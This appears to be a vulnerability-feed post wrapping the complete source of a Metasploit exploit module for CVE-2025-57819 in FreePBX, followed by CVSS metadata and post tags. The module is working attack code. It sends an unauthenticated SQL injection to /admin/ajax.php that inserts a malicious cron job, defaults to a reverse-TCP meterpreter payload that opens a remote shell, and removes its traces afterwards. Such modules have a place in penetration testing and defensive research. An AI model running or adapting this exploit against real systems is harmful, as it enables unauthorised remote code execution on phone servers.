{“lastseen”:”2025-09-23T19:06:19″,”description”:”This module exploits an unauthenticated SQL injection flaw in FreePBX prior to versions 15.0.66, 16.0.89, and…”,”published”:”2025-09-23T18:56:43″,”modified”:”2025-09-23T18:56:43″,”type”:”metasploit”,”title”:”FreePBX ajax.php unuthenticated SQLi to RCE”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-UNIX-HTTP-FREEPBX_UNAUTH_SQLI_TO_RCE-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-57819″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n\\n include Msf::Exploit::Remote::HttpClient\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘FreePBX ajax.php unuthenticated SQLi to RCE’,\\n ‘Description’ =\\u003e %q{\\n This module exploits an unauthenticated SQL injection flaw in FreePBX prior to versions 15.0.66, 16.0.89,\\n and 17.0.3. The vulnerability lies in the \/admin\/ajax.php endpoint, which is accessible without\\n authentication. Additionally, the database user created by FreePBX can schedule cronjobs, allowing\\n remote code execution on the target system.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘Echo_Slow’, # msf module\\n ‘Piotr Bazydlo’, # POC used as a template\\n ‘Sonny’ # POC used as a template\\n ],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2025-57819’],\\n [‘URL’, ‘https:\/\/labs.watchtowr.com\/you-already-have-our-personal-data-take-our-phone-calls-too-freepbx-cve-2025-57819\/’]\\n ],\\n ‘Platform’ =\\u003e [‘linux’],\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Targets’ =\\u003e [\\n [\\n ‘Unix Command’,\\n {\\n ‘DefaultOptions’ =\\u003e\\n {\\n ‘Payload’ =\\u003e ‘cmd\/linux\/http\/x64\/meterpreter\/reverse_tcp’,\\n ‘WfsDelay’ =\\u003e 70 # cronjob may take up to a minute to start\\n }\\n }\\n ]\\n ],\\n ‘Privileged’ =\\u003e false,\\n ‘DisclosureDate’ =\\u003e ‘2025-08-28’,\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK, IOC_IN_LOGS]\\n }\\n )\\n )\\n\\n register_options(\\n [\\n OptString.new(\\n ‘TARGETURI’,\\n [false, ‘The URI for the FreePBX installation’, ‘\/’]\\n )\\n ]\\n )\\n end\\n\\n def check\\n print_status(‘Checking if vulnerable…’)\\n\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘admin’, ‘ajax.php’),\\n ‘vars_get’ =\\u003e {\\n ‘module’ =\\u003e ‘FreePBX\\\\\\\\modules\\\\\\\\endpoint\\\\\\\\ajax’,\\n ‘command’ =\\u003e ‘model’,\\n ‘template’ =\\u003e Rex::Text.rand_text_alphanumeric(3..6),\\n ‘model’ =\\u003e Rex::Text.rand_text_alphanumeric(3..6),\\n ‘brand’ =\\u003e \\”#{Rex::Text.rand_text_alphanumeric(3..6)}’\\”\\n }\\n )\\n\\n if res\\u0026.code == 500 \\u0026\\u0026 res.body =~ \/You have an error in your SQL syntax\/\\n return Exploit::CheckCode::Vulnerable(‘Detected SQL injection’)\\n end\\n\\n Exploit::CheckCode::Safe(‘No SQL injection detected, target is patched’)\\n end\\n\\n def exploit\\n module_name = Rex::Text.rand_text_alpha(4..7)\\n @job_name = Rex::Text.rand_text_alpha(4..7)\\n\\n rce_payload = Rex::Text.rand_text_alpha(4..7)\\n rce_payload \\u003c\\u003c \\”‘;INSERT INTO cron_jobs (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order)\\”\\n rce_payload \\u003c\\u003c \\” VALUES (‘#{module_name}’,’#{@job_name}’,’#{payload.encoded}’,NULL,’* * * * *’,30,1,1) — \\”\\n\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘admin’, ‘ajax.php’),\\n ‘vars_get’ =\\u003e {\\n ‘module’ =\\u003e ‘FreePBX\\\\\\\\modules\\\\\\\\endpoint\\\\\\\\ajax’,\\n ‘command’ =\\u003e ‘model’,\\n ‘template’ =\\u003e Rex::Text.rand_text_alphanumeric(3..6),\\n ‘model’ =\\u003e Rex::Text.rand_text_alphanumeric(3..6),\\n ‘brand’ =\\u003e rce_payload\\n }\\n )\\n\\n if res\\u0026.code == 500 \\u0026\\u0026 res.body =~ \/Trying to access array offset on value of type bool\/\\n print_good(\\”Created cronjob with job name: ‘#{@job_name}’\\”)\\n print_status(‘Waiting for cronjob to trigger…’)\\n else\\n fail_with(Failure::PayloadFailed, ‘Cronjob was not created.’)\\n end\\n end\\n\\n def cleanup\\n super\\n\\n return unless @job_name\\n\\n # Remove the created cronjob\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘admin’, ‘ajax.php’),\\n ‘vars_get’ =\\u003e {\\n ‘module’ =\\u003e ‘FreePBX\\\\\\\\modules\\\\\\\\endpoint\\\\\\\\ajax’,\\n ‘command’ =\\u003e ‘model’,\\n ‘template’ =\\u003e Rex::Text.rand_text_alphanumeric(3..6),\\n ‘model’ =\\u003e Rex::Text.rand_text_alphanumeric(3..6),\\n ‘brand’ =\\u003e \\”‘; DELETE FROM cron_jobs WHERE jobname=\\\\’#{@job_name}\\\\’ — \\”\\n }\\n )\\n\\n print_status(‘Attempting to perform cleanup’)\\n\\n if res\\u0026.code == 500 \\u0026\\u0026 res.body =~ \/Trying to access array offset on value of type bool\/\\n print_good(‘Cronjob removed, happy hacking!’)\\n else\\n print_bad(‘Cronjob not removed, please perform manual cleanup!’)\\n end\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/unix\/http\/freepbx_unauth_sqli_to_rce.rb”,”cvss”:{“score”:10,”severity”:”CRITICAL”,”vector”:”CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:H\/SC:H\/VI:H\/SI:H\/VA:H\/SA:H”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/unix\/http\/freepbx_unauth_sqli_to_rce\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-09-23T19:06:19″,”description”:”This module exploits an unauthenticated SQL injection flaw in FreePBX prior to versions 15.0.66, 16.0.89, and…”,”published”:”2025-09-23T18:56:43″,”modified”:”2025-09-23T18:56:43″,”type”:”metasploit”,”title”:”FreePBX ajax.php unuthenticated SQLi to RCE”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-UNIX-HTTP-FREEPBX_UNAUTH_SQLI_TO_RCE-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-57819″],”sourceData”:”##\\n# This module requires Metasploit:…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,169,13,7,11,5],"class_list":["post-18798","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n